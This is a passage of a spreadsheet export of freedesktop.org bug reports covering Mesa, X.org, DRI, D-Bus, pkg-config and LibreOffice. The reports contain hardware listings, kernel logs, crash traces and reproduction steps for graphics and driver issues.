	Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h [Opteron Athlon64 Sempron] Miscellaneous Control
	Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Capabilities: 
00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h [Opteron Athlon64 Sempron] Link Control
	Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
01:05.0 VGA compatible controller: ATI Technologies Inc Radeon HD 3200 Graphics (prog-if 00 [VGA controller])
	Subsystem: ASUSTeK Computer Inc. Device 82f1
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 379
	Region 0: Memory at d0000000 (32-bit prefetchable) [size=256M]
	Region 1: I/O ports at c000 [size=256]
	Region 2: Memory at fbaf0000 (32-bit non-prefetchable) [size=64K]
	Region 5: Memory at fb900000 (32-bit non-prefetchable) [size=1M]
	Expansion ROM at  [disabled]
	Capabilities: 
	Kernel driver in use: fglrx_pci
01:05.1 Audio device: ATI Technologies Inc RS780 Azalia controller
	Subsystem: ASUSTeK Computer Inc. Device 82f1
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin B routed to IRQ 19
	Region 0: Memory at fbae8000 (32-bit non-prefetchable) [size=16K]
	Capabilities: 
	Kernel driver in use: HDA Intel
02:00.0 FireWire (IEEE 1394): JMicron Technologies Inc. IEEE 1394 Host Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 8313
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 17
	Region 0: Memory at fbbff800 (32-bit non-prefetchable) [size=2K]
	Region 1: Memory at fbbff400 (32-bit non-prefetchable) [size=128]
	Region 4: Memory at fbbff000 (32-bit non-prefetchable) [size=128]
	Region 5: Memory at fbbfec00 (32-bit non-prefetchable) [size=128]
	Capabilities: 
	Kernel driver in use: ohci1394
03:00.0 Ethernet controller: Realtek Semiconductor Co. Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 02)
	Subsystem: ASUSTeK Computer Inc. Device 82c6
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 380
	Region 0: I/O ports at d800 [size=256]
	Region 2: Memory at fbcff000 (64-bit non-prefetchable) [size=4K]
	Region 4: Memory at faff0000 (64-bit prefetchable) [size=64K]
	Expansion ROM at fbcc0000 [disabled] [size=128K]
	Capabilities: 
	Kernel driver in use: r8169
04:06.0 Ethernet controller: Intel Corporation 82557/8/9/0/1 Ethernet Pro 100 (rev 08)
	Subsystem: IBM Netfinity 10/100
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 (2000ns min 14000ns max) Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 20
	Region 0: Memory at fbfff000 (32-bit non-prefetchable) [size=4K]
	Region 1: I/O ports at ec00 [size=64]
	Region 2: Memory at fbe00000 (32-bit non-prefetchable) [size=1M]
	Expansion ROM at f0000000 [disabled] [size=1M]
	Capabilities: 
	Kernel driver in use: e100</t>
  </si>
  <si>
    <t>emanuele.zamprogno</t>
  </si>
  <si>
    <t>MESA-29337</t>
  </si>
  <si>
    <t>glsl2: GLSL compiler errors with most piglit tests</t>
  </si>
  <si>
    <t>Created attachment 37494
Valgrind output for glsl-fs-exp piglit test.
Most of the piglit tests I try with the glsl2 branch fail with this error (some have more than just this one):
Failed to compile FS: 0:2(10): error: function `main' return type has qualifiers
The full piglit results are here: http://ix.cs.uoregon.edu/~tstellar/piglit/glsl2/
I've observed this behavior on two different machines both of which run Gentoo.  It seems like it might be a memory bug I've attached the valgrind output from one of the tests.   This test passes when run with valgrind but fails when run on its own.</t>
  </si>
  <si>
    <t>DBUS-12849</t>
  </si>
  <si>
    <t>[patch] fix misplaced dbus_free in dbus-gvalue.c</t>
  </si>
  <si>
    <t>demarshal_valuearray() could use 'current_sig' after it has been freed. Attaching a patch.</t>
  </si>
  <si>
    <t>XORG-26899</t>
  </si>
  <si>
    <t>[intel 915GM] [kms] Output VGA1 disconnected</t>
  </si>
  <si>
    <t>There is no display with intel driver. When kms is disabled the console is available but X still does not load.
---Steps to Reproduce---
1) Install SLED 11 SP 1 (Beta 5)
2) No display is seen after installation not even the console
3) Reboot
4) use kernel parameter nomodeset during boot
5) X runs into GdmDisplay errors only console is available
--- lspci -v -s output ---
00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML
Express Graphics Controller (rev 04) (prog-if 00 [VGA controller])
        Subsystem: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics
Controller
        Flags: bus master fast devsel latency 0 IRQ 16
        Memory at fdf00000 (32-bit non-prefetchable) [size=512K]
        I/O ports at ff00 [size=8]
        Memory at d0000000 (32-bit prefetchable) [size=256M]
        Memory at fdf80000 (32-bit non-prefetchable) [size=256K]
        Capabilities: [d0] Power Management version 2
        Kernel modules: i915</t>
  </si>
  <si>
    <t>chiangqy</t>
  </si>
  <si>
    <t>XORG-14668</t>
  </si>
  <si>
    <t>YUV2 on textured video not shown correctly..</t>
  </si>
  <si>
    <t>YUY2 and UYVY aren't shown correctly using the textured xv video port on my powerpc. I can't test it on an x86 but this might just be an endianess error.. I420 and YV12 work fine.
This is on a powerbook G4 with a RV350</t>
  </si>
  <si>
    <t>DRI-91715</t>
  </si>
  <si>
    <t>[SKL] crash after serveral hibernate-resume iterations</t>
  </si>
  <si>
    <t>Created attachment 117839
S4_SKL_Tests.zip
Bug description:
------------------
After running suspend_stress_test.shell script the platform hangs after several S4 iterations 
System environment:
------------------
Hardware
Platform: SKY LAKE Y A0 
CPU : Intel(R) Core(TM) m3-6Y30 CPU @ 0.8GHz 4MB (family: 6 model: 78  stepping: 3)
MCP : SKL-Y  D1  2+2 (ou ULX-D1)
QDF : QYV3 
CPU : SKL D0
Chipset PCH: Sunrise Point LP C1       
CRB : SKY LAKE Y LPDDR3 RVP3 CRB FAB2
Reworks : All Mandatories + FBS02 &amp; FBS03 O-06
Graphic stack:
cairo: (HEAD tag: 1.14.2) 93422b3cb5e0ef8104b8194c8873124ce2f5ea2d from git://git.freedesktop.org/git/cairo
drm: (HEAD origin/master origin/HEAD master) 2a34176123b1dbf55d129248a431afb185e6a37c from git://git.freedesktop.org/git/mesa/drm
intel-driver: (HEAD origin/master origin/HEAD master) 7c47a8f74878904e0d2fbb5da966552f783d74ab from git://git.freedesktop.org/git/vaapi/intel-driver
libva: (HEAD origin/master origin/HEAD master) fdd6ee00c916f530e4d0aa1b250633643999dcf1 from git://git.freedesktop.org/git/vaapi/libva
mesa: (HEAD origin/10.6) 99793e2541510fe208d29e69fedf97a6fff006f8 from git://git.freedesktop.org/git/mesa/mesa
xf86-video-intel: (HEAD origin/master origin/HEAD master) 9b0ed16385ae076c262a2e09639822d9488ccf57 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
xserver: (HEAD origin/master origin/HEAD master) 533fb627398e20f863234d780f4463e37007515b from git://git.freedesktop.org/git/xorg/xserver
Software :
Linux distribution: Ubuntu 14.04.02 X64
BIOS : SKLSE2R1.R00.X093.B02.1507222151
ME FW : 11.0.0.1163
Ksc (EC FW): 1.15
Firmware: skl_guc_ver3.2-signed-1.0.0.1137
Kernel : drm-intel-nightly 30263ef782e0548c114fb6f2771b58b27c56ba0d 4.2.0-rc7 from git://anongit.freedesktop.org/drm-intel 
Kernel commit log:
commit 30263ef782e0548c114fb6f2771b58b27c56ba0d 
Author: Jani Nikula 
Date: Mon Aug 17 10:19:43 2015 +0300 
drm-intel-nightly: 2015y-08m-17d-07h-19m-25s UTC integration manifest
rendercheck: (HEAD tag: rendercheck-1.5 origin/master origin/HEAD master) 604e3bbe6d8d96bec284a83c08c5cc5f159a243c from git://git.freedesktop.org/git/xorg/app/rendercheck
Display Configuration : 
-----------------------
Display connector &gt; eDP
Reproducing steps:
------------------
1-Boot the system only with eDP connected
2-Download the script attached called suspend_stress_test.shell and execute the following command as root: 
#./suspend_stress_test.shell --iterations=2000 --mode=disk --suspend=55-65 --wake=25-35 --abort=none --display=error --file=disk-results
Current results:
-----------------
After several S4 iterations the DUT hangs around 750 in our case.
Expected results :
-----------------
The DUT should complete hibernate stress tests script after 2000 iterations
Additional info:
------------------
The file S4_SKL_Tests.zip contains the following :
-suspend_stress_test.shell   which is the script to run the tests
-dmesg.rtf  GPU_crash_dump_file GPU_hang Xorg  logs grabbed from the DUT
-disk-results.rtf  which contains the S4 results.</t>
  </si>
  <si>
    <t>DRI-100322</t>
  </si>
  <si>
    <t>[BDW][EXT] igt@drv_suspend@fence-restore-tiled2untiled incomplete</t>
  </si>
  <si>
    <t>On extended run igt@drv_suspend@fence-restore-tiled2untiled hangs.
Dmesg attached</t>
  </si>
  <si>
    <t>DRI-108709</t>
  </si>
  <si>
    <t>WARNING: CPU: 0 PID: 507 at lib/debugobjects.c:329 debug_print_object+0x6a/0x80</t>
  </si>
  <si>
    <t>Created attachment 142433
dmesg
$ inxi -bM
System:    Host: localhost.localdomain Kernel: 4.20.0-0.rc1.git4.1.fc30.x86_64 x86_64 bits: 64 Desktop: Gnome 3.30.1 
           Distro: Fedora release 30 (Rawhide) 
Machine:   Type: Desktop Mobo: ASUSTeK model: ROG STRIX X470-I GAMING v: Rev 1.xx serial:  
           UEFI: American Megatrends v: 0901 date: 07/23/2018 
CPU:       8-Core: AMD Ryzen 7 2700X type: MT MCP speed: 2805 MHz min/max: 2200/4000 MHz 
Graphics:  Device-1: Advanced Micro Devices [AMD/ATI] Vega 10 XL/XT [Radeon RX Vega 56/64] driver: amdgpu v: kernel 
           Display: wayland server: Fedora Project X.org 1.20.3 driver: amdgpu resolution: 3840x2160~60Hz 
           OpenGL: renderer: Radeon RX Vega (VEGA10 DRM 3.27.0 4.20.0-0.rc1.git4.1.fc30.x86_64 LLVM 7.0.0) v: 4.5 Mesa 18.2.4 
Network:   Device-1: Intel I211 Gigabit Network driver: igb 
           Device-2: Realtek RTL8822BE 802.11a/b/g/n/ac WiFi adapter driver: r8822be 
Drives:    Local Storage: total: 11.36 TiB used: 5.93 TiB (52.2%) 
Info:      Processes: 440 Uptime: 37m Memory: 31.30 GiB used: 16.56 GiB (52.9%) Shell: bash inxi: 3.0.27 
[    5.591649] [drm] amdgpu: 8176M of VRAM memory ready
[    5.591653] [drm] amdgpu: 8176M of GTT memory ready.
[    5.591743] [drm] GART: num cpu pages 131072 num gpu pages 131072
[    5.591908] [drm] PCIE GART of 512M enabled (table at 0x000000F400900000).
[    5.595509] [drm] use_doorbell being set to: [true]
[    5.595622] [drm] use_doorbell being set to: [true]
[    5.595963] [drm] Found UVD firmware Version: 1.87 Family ID: 17
[    5.595969] [drm] PSP loading UVD firmware
[    5.596266] ------------[ cut here ]------------
[    5.596268] ODEBUG: assert_init not available (active state 0) object type: timer_list hint:           (null)
[    5.596285] WARNING: CPU: 0 PID: 507 at lib/debugobjects.c:329 debug_print_object+0x6a/0x80
[    5.596286] Modules linked in: amdgpu(+) hid_logitech_hidpp(+) chash gpu_sched amd_iommu_v2 ttm drm_kms_helper crc32c_intel drm hid_sony ff_memless igb hid_logitech_dj nvme dca i2c_algo_bit nvme_core wmi pinctrl_amd uas usb_storage
[    5.596299] CPU: 0 PID: 507 Comm: systemd-udevd Tainted: G        W         4.20.0-0.rc1.git4.1.fc30.x86_64 #1
[    5.596301] Hardware name: System manufacturer System Product Name/ROG STRIX X470-I GAMING BIOS 0901 07/23/2018
[    5.596303] RIP: 0010:debug_print_object+0x6a/0x80
[    5.596305] Code: 8b 43 10 83 c2 01 8b 4b 14 4c 89 e6 89 15 e6 82 b0 02 4c 8b 45 00 48 c7 c7 60 fd 34 a6 48 8b 14 c5 a0 da 08 a6 e8 6a 6a b8 ff  0b 5b 83 05 d0 45 3e 01 01 5d 41 5c c3 83 05 c5 45 3e 01 01 c3
[    5.596306] RSP: 0018:ffffa02ac863f8c0 EFLAGS: 00010282
[    5.596307] RAX: 0000000000000000 RBX: ffffa02ac863f8e0 RCX: 0000000000000006
[    5.596308] RDX: 0000000000000007 RSI: ffff9160e9a7bfe8 RDI: ffff9160f91d6c60
[    5.596310] RBP: ffffffffa6742740 R08: 0000000000000002 R09: 0000000000000000
[    5.596311] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffffa634ff69
[    5.596312] R13: 00000000000b79d0 R14: ffffffffa80f76d8 R15: 0000000000266000
[    5.596313] FS:  00007f762abf7940(0000) GS:ffff9160f9000000(0000) knlGS:0000000000000000
[    5.596314] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    5.596315] CR2: 000055fdc593f000 CR3: 00000007e999c000 CR4: 00000000003406f0
[    5.596317] Call Trace:
[    5.596321]  debug_object_assert_init+0x14a/0x180
[    5.596327]  del_timer+0x2e/0x90
[    5.596383]  amdgpu_fence_process+0x47/0x100 [amdgpu]
[    5.596430]  amdgpu_uvd_resume+0xf6/0x120 [amdgpu]
[    5.596475]  uvd_v7_0_sw_init+0xe0/0x280 [amdgpu]
[    5.596523]  amdgpu_device_init.cold.30+0xf97/0x14b6 [amdgpu]
[    5.596563]  ? amdgpu_driver_load_kms+0x53/0x330 [amdgpu]
[    5.596604]  amdgpu_driver_load_kms+0x86/0x330 [amdgpu]
[    5.596614]  drm_dev_register+0x115/0x150 [drm]
[    5.596654]  amdgpu_pci_probe+0xbd/0x120 [amdgpu]
[    5.596658]  local_pci_probe+0x41/0x90
[    5.596661]  pci_device_probe+0x188/0x1a0
[    5.596666]  really_probe+0xf8/0x3b0
[    5.596669]  driver_probe_device+0xb3/0xf0
[    5.596672]  __driver_attach+0xe1/0x110
[    5.596674]  ? driver_probe_device+0xf0/0xf0
[    5.596676]  bus_for_each_dev+0x79/0xc0
[    5.596679]  bus_add_driver+0x155/0x230
[    5.596681]  ? 0xffffffffc07d9000
[    5.596683]  driver_register+0x6b/0xb0
[    5.596685]  ? 0xffffffffc07d9000
[    5.596688]  do_one_initcall+0x5d/0x2be
[    5.596691]  ? rcu_read_lock_sched_held+0x79/0x80
[    5.596693]  ? kmem_cache_alloc_trace+0x264/0x290
[    5.596695]  ? do_init_module+0x22/0x210
[    5.596698]  do_init_module+0x5a/0x210
[    5.596701]  load_module+0x2137/0x2430
[    5.596703]  ? lockdep_hardirqs_on+0xed/0x180
[    5.596714]  ? __do_sys_init_module+0x150/0x1a0
[    5.596715]  __do_sys_init_module+0x150/0x1a0
[    5.596722]  do_syscall_64+0x60/0x1f0
[    5.596725]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
[    5.596726] RIP: 0033:0x7f762b877dee
[    5.596728] Code: 48 8b 0d 9d 20 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 af 00 00 00 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 6a 20 0c 00 f7 d8 64 89 01 48
[    5.596729] RSP: 002b:00007ffc777b8558 EFLAGS: 00000246 ORIG_RAX: 00000000000000af
[    5.596730] RAX: ffffffffffffffda RBX: 000055fdc48da320 RCX: 00007f762b877dee
[    5.596731] RDX: 00007f762b9f284d RSI: 00000000006c5fc6 RDI: 000055fdc527a060
[    5.596732] RBP: 00007f762b9f284d R08: 0000000000000003 R09: 0000000000000002
[    5.596733] R10: 000055fdc48ad010 R11: 0000000000000246 R12: 000055fdc527a060
[    5.596734] R13: 000055fdc48dca20 R14: 0000000000020000 R15: 0000000000000000
[    5.596740] irq event stamp: 134618
[    5.596743] hardirqs last  enabled at (134617): [] console_unlock+0x45e/0x610
[    5.596744] hardirqs last disabled at (134618): [] trace_hardirqs_off_thunk+0x1a/0x1c
[    5.596746] softirqs last  enabled at (133146): [] __do_softirq+0x365/0x47c
[    5.596748] softirqs last disabled at (133139): [] irq_exit+0x119/0x120
[    5.596749] ---[ end trace eaee508abfebccdc ]---
[    5.597030] [drm] Found VCE firmware Version: 55.3 Binary ID: 4
[    5.597040] [drm] PSP loading VCE firmware
[    5.598690]  nvme0n1: p1 p2 p3
[    5.671546] PM: Image not found (code -22)
[    5.747192] [drm] reserve 0x400000 from 0xf400d00000 for PSP TMR SIZE
[    5.808672] input: Logitech T400 as /devices/pci0000:00/0000:00:07.1/0000:0c:00.3/usb3/3-4/3-4.1/3-4.1.3/3-4.1.3:1.2/0003:046D:C52B.0004/0003:046D:4026.0008/input/input14
[    5.809453] logitech-hidpp-device 0003:046D:4026.0008: inputhidraw5: USB HID v1.11 Keyboard [Logitech T400] on usb-0000:0c:00.3-4.1.3:1
[    5.829326] [drm] Display Core initialized with v3.1.68!
[    5.893855] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    5.893857] [drm] Driver supports precise vblank timestamp query.
[    5.915201] [drm] UVD and UVD ENC initialized successfully.
[    6.015826] [drm] VCE initialized successfully.</t>
  </si>
  <si>
    <t>XORG-1021</t>
  </si>
  <si>
    <t>New mirror site at mirrorservice.org</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
We've got a mirror of ftp.x.org at mirrorservice.org the access URLs are:
http://www.mirrorservice.org/sites/ftp.x.org/
ftp://ftp.mirrorservice.org/sites/ftp.x.org/
rsync://rsync.mirrorservice.org/ftp.x.org/
We used to be at mirror.ac.uk so it's possible that you used to list our mirror
there and stopped when the old site was taken over by its new owners. We'll now
continue to operate from mirrorservice.org.
Boilerplate text that we sent to all mirrors when we changed domains follows:
Your content will be available by default using all three protocols. (If
you don't want this let us know.) Our web interface allows users to
browse inside archives and ISO images.
If you want a symlink in /pub/ pointing to your content so
ftp.mirrorservice.org can be used in an FTP round-robin please let us
know. (These are already in place for some sites.) If you have DNS
CNAMEs pointing at mirror.ac.uk addresses these will also need to be
updated to point to the corresponding mirrorservice.org addresses.
The mirrorservice.org hosts are located at the University of Kent in
Canterbury Kent United Kingdom which has a 155Mbit link to the rest
of the world (due to be upgraded to 1Gbit in the near future).
Mirroring is performed as before from the IPv4 addresses
212.219.56.140 (compton.mirrorservice.org) and 212.219.56.132
(palomar.mirrorservice.org).
Please contact us at  if you have any
questions.
Thanks
The UK Mirror Service team
</t>
  </si>
  <si>
    <t>XORG-11484</t>
  </si>
  <si>
    <t>Leaking lock files</t>
  </si>
  <si>
    <t>1 Start Xephyr
2 Close it using the window manager
-&gt; /tmp/.X$DISPLAY.lock is still there</t>
  </si>
  <si>
    <t>LIBREOFFICE-48272</t>
  </si>
  <si>
    <t>FILEOPEN documents created with OOo: VIEWING pictures and objects with wrong hight and at wrong vertical position.</t>
  </si>
  <si>
    <t>Created attachment 59459
spreadsheet with form and drawing elements
Attached file was created in OpenOffice 2.0 Openoffice 3.3 still opens this file same way as previous version.
In LibreOffice 3.4 and 3.5 placement and sizes of form and drawing elements are different making this document unusable.</t>
  </si>
  <si>
    <t>rychu</t>
  </si>
  <si>
    <t>DRI-101461</t>
  </si>
  <si>
    <t>[SKL] Unplugging the HDMI/DP/mDP cable from dock will not automically resize framebuffer</t>
  </si>
  <si>
    <t>Created attachment 131992
Kernel log (drm.debug=0xe) Xorg.0.log xrandr and screenshot
Unplugging the HDMI/DP/mDP cable from dock will not automically resize framebuffer. drm/i915 receives hotplug event but does not handle it.
I submitted a patch  but it was rejected.
https://patchwork.freedesktop.org/patch/161729/
Here is the reply from ville.syrjala@linux.intel.com
---
We're not supposed to handle it like that. The HPD is for the main encoder
the MST hotplug handling comes via the topology manager.
---
Reproduction steps:
1. The external monitor with DP/mDP/HDMI cable connected to Dell Dock.
All two displays: Built-in LCD and external DP/mDP/HDMI monitor
2. Boot to Ubuntu Desktop
3. See two displays (extend mode)
4. Unplug the DP/mDP/HDMI cable
5. Press the PrtScn button to capture the screen.
We still have two screens after unplugging the cable.
Additional information:
1. Kernel: 4.12.0-994-generic x86_64
2. Linux distribution: Ubuntu 16.04.2 LTS
3. Laptop: Dell Precision 5520
4. Dell Business Thunderbolt Dock - TB16
https://goo.gl/vFDjpi
5. kernel log:
[CONNECTOR:48:eDP-1]: Built-in LCD 
[CONNECTOR:74:DP-4]: The external monitor connected to Dell Dock
How to recover:
1. Go to [All Settings] =&gt; [Displays] =&gt; Press [Detect Displays] or
2. Run xrandr to resize the screen</t>
  </si>
  <si>
    <t>ethan.hsieh</t>
  </si>
  <si>
    <t>MESA-109573</t>
  </si>
  <si>
    <t>dEQP-VK.spirv_assembly.instruction.graphics.module.same_module</t>
  </si>
  <si>
    <t>This test regressed with:
ef99f4c8d176f4e854e12afa1545fa53f651d758
Author:     Kenneth Graunke 
compiler: Mark clip/cull distance arrays as compact before lowering.
nir_lower_clip_cull_distance_arrays() marks the combined clip/cull
distance array as compact.  However when translating in from GLSL
or SPIR-V we were not marking the original float[] arrays as compact.
We should do so.  That way we can detect these corner cases properly.
-------------------------------
FWIW this test is listed as previously fixed by
3b804819650cc943fcd4cccedd140e4b27fbf993
Patch seems unrelated so it was possibly fixed by some patch just before it.</t>
  </si>
  <si>
    <t>PKG-CONFIG-48743</t>
  </si>
  <si>
    <t>pkg.m4 doesn't tell us where to install .pc files</t>
  </si>
  <si>
    <t>A lot of projects seem to install their .pc file something like this:
 pkgconfigdir = $(libdir)/pkgconfig
 pkgconfig_DATA = myproject.pc
However some systems (like FreeBSD) don't put their pkg-config files in $(libdir)/pkgconfig and thus they seem to end up patching a whole load of projects to *change* this. I discovered a patch to my own project which changes it thus:
	@${REINPLACE_CMD} -e 's|libdir)/pkgconfig|prefix)/libdata/pkgconfig|' \
		${WRKSRC}/Makefile.in ${WRKSRC}/Makefile.am
This is horrid. We should be able to *ask* pkg-config what the first directory on its search path is and get it right in all cases. Or it should be possible to pass --pkgconfigdir= on the configure command line. Or something like that.
Either way it would ideally be implemented once in pkg.m4 rather than in the configure.ac of *every* project that installs a .pc file.</t>
  </si>
  <si>
    <t>DRI-107372</t>
  </si>
  <si>
    <t>[CI][BAT] igt@kms_psr@* - dmesg-warn / dmesg-fail - PSR idle timed out atomic update may fail</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4539/fi-cnl-psr/igt@kms_psr@primary_mmap_gtt.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4539/fi-cnl-psr/igt@kms_psr@cursor_plane_move.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4539/fi-cnl-psr/igt@kms_psr@primary_page_flip.html
[  473.103275] [drm:intel_pipe_update_start [i915]] *ERROR* PSR idle timed out atomic update may fail</t>
  </si>
  <si>
    <t>XORG-24193</t>
  </si>
  <si>
    <t>radeon kms rv770 incorect display detection</t>
  </si>
  <si>
    <t>Created attachment 29920
tarball of logs etc
when i boot with kms enabled my secondary display only shows stuff till kms kicks in
i cannot get anything to output to it after x has started either
both displays works fine without kms
my graphics card has 3 outputs (one i assume is svid and 2 dvi )
xrandr shows 4 with 3 connected
attached dmesg xrandr -q and xorg.log with and without kms</t>
  </si>
  <si>
    <t>chainsawbike</t>
  </si>
  <si>
    <t>DRI-26858</t>
  </si>
  <si>
    <t>[headless] no glxgears output if disconnecting monitor before starting X</t>
  </si>
  <si>
    <t>Created attachment 33719
Xorg log
System Environment:
--------------------
Platform:        ALL
Mesa:           (master)abcb6b6d01c253627363a05205291630b5247018
Xserver:           (master)a34812b09000db2ff2a1dc6182602839123edd4e
Xf86_video_intel:       (master)c2c670ef18755cf5c878edf8a6b7d1617f54fe73
Libdrm:         (master)3130f94c6ee32668cb9f0b96b6c8e308a7bb3b11
Kernel:  (master)724e6d3fe8003c3f60bf404bf22e4e331327c596
Bug detailed description:
-------------------------
With bug#14611 fixed and enable VGA output by kernel option we can start X without monitor connected. But there also have problem as following described:
Start machine with monitor attached. After kernel booting disconnect monitor and then start X. Running glxgears we find the running status is wrong. Connecting monitor again we can see the running 3D window is blank screen. If start X first and then disconnect monitor glxgears works well.
There is another condtions: Start machine without monitor attached. After kernel booting then start X glxgears also works fine. 
Reproduce steps:
----------------
1.enable VGA output with kernel option in the grub: video=VGA-1:e
2.reboot machine with monitor connected
3.disconnect monitor before starting X
4.start X
5.run glxgears</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-84179</t>
  </si>
  <si>
    <t>Wrong behaviour when SYNCEVOLUTION_PBAP_CHUNK_TRANSFER_TIME is &lt;= 0</t>
  </si>
  <si>
    <t>Setting SYNCEVOLUTION_PBAP_CHUNK_TRANSFER_TIME to value &lt;= 0 is not
working like described in README file - according to it it should turn it off which in my understanding should disable tuning of chunks size and use constant value for each transfer (equal either to SYNCEVOLUTION_PBAP_CHUNK_MAX_COUNT_PHOTO or SYNCEVOLUTION_PBAP_CHUNK_MAX_COUNT_NO_PHOTO).
Currently in such case chunk size is modified and is decreasing very quickly until reaching 0 which causes synchronization finish without downloading all
contacts and without returning any error.</t>
  </si>
  <si>
    <t>mateusz.polrola</t>
  </si>
  <si>
    <t>DRI-100213</t>
  </si>
  <si>
    <t>[i915] [SKL] Incomplete list of HDMI connected display resolution detected</t>
  </si>
  <si>
    <t>Created attachment 130230
dmesg
Connecting projector (EPSON EH-TW5900) into HDMI results in incomplete supported modes detected:
$ grep . /sys/class/drm/card*-*/modes
/sys/class/drm/card0-DP-2/modes:720x576
/sys/class/drm/card0-DP-2/modes:720x480
/sys/class/drm/card0-DP-2/modes:720x480
/sys/class/drm/card0-DP-2/modes:640x480
/sys/class/drm/card0-DP-2/modes:640x480
/sys/class/drm/card1-eDP-1/modes:1920x1080
/sys/class/drm/card1-eDP-1/modes:1920x1080
Above is with Hybrid Graphics selected in BIOS.
However doing the same with Discrete graphics selected I get:
$ grep . /sys/class/drm/card*-*/modes
/sys/class/drm/card0-DP-2/modes:1920x1080
/sys/class/drm/card0-DP-2/modes:1920x1080
/sys/class/drm/card0-DP-2/modes:1920x1080i
/sys/class/drm/card0-DP-2/modes:1920x1080i
/sys/class/drm/card0-DP-2/modes:1920x1080
/sys/class/drm/card0-DP-2/modes:1920x1080i
/sys/class/drm/card0-DP-2/modes:1920x1080
/sys/class/drm/card0-DP-2/modes:1920x1080
/sys/class/drm/card0-DP-2/modes:1280x720
/sys/class/drm/card0-DP-2/modes:1280x720
/sys/class/drm/card0-DP-2/modes:1280x720
/sys/class/drm/card0-DP-2/modes:1440x576
/sys/class/drm/card0-DP-2/modes:1440x480
/sys/class/drm/card0-DP-2/modes:1440x480
/sys/class/drm/card0-DP-2/modes:720x576
/sys/class/drm/card0-DP-2/modes:720x480
/sys/class/drm/card0-DP-2/modes:720x480
/sys/class/drm/card0-DP-2/modes:640x480
/sys/class/drm/card0-DP-2/modes:640x480
/sys/class/drm/card0-eDP-1/modes:1920x1080
/sys/class/drm/card0-eDP-1/modes:1920x1080
/sys/class/drm/card0-eDP-1/modes:1680x1050
/sys/class/drm/card0-eDP-1/modes:1400x1050
/sys/class/drm/card0-eDP-1/modes:1280x1024
/sys/class/drm/card0-eDP-1/modes:1280x960
/sys/class/drm/card0-eDP-1/modes:1152x864
/sys/class/drm/card0-eDP-1/modes:1024x768
/sys/class/drm/card0-eDP-1/modes:800x600
/sys/class/drm/card0-eDP-1/modes:640x480
/sys/class/drm/card0-eDP-1/modes:720x400
/sys/class/drm/card0-eDP-1/modes:640x400
/sys/class/drm/card0-eDP-1/modes:640x350
Tested with today's drm-tip userspace is current Debian Stretch using gnome-desktop (Wayland).
Machine is HP ZBook 17 G3 dmesg attached.
Machines</t>
  </si>
  <si>
    <t>ladis</t>
  </si>
  <si>
    <t>XORG-25326</t>
  </si>
  <si>
    <t>the radeon driver crash when resuming from changing vt</t>
  </si>
  <si>
    <t>Created attachment 31522
crash backtrace
when i try to switch the virtual terminal pressing ctrl+alt+f1 or similar it correctly switch to the console but when i press ctrl+alt+f7 to go back it crashes every time. 
i use Gentoo linux on an Acer TravelMate 6460 i report here some information. 
------------------------------------------------------
radeon driver version: 6.12.4
xorg server version: 1.6.3.901-r2
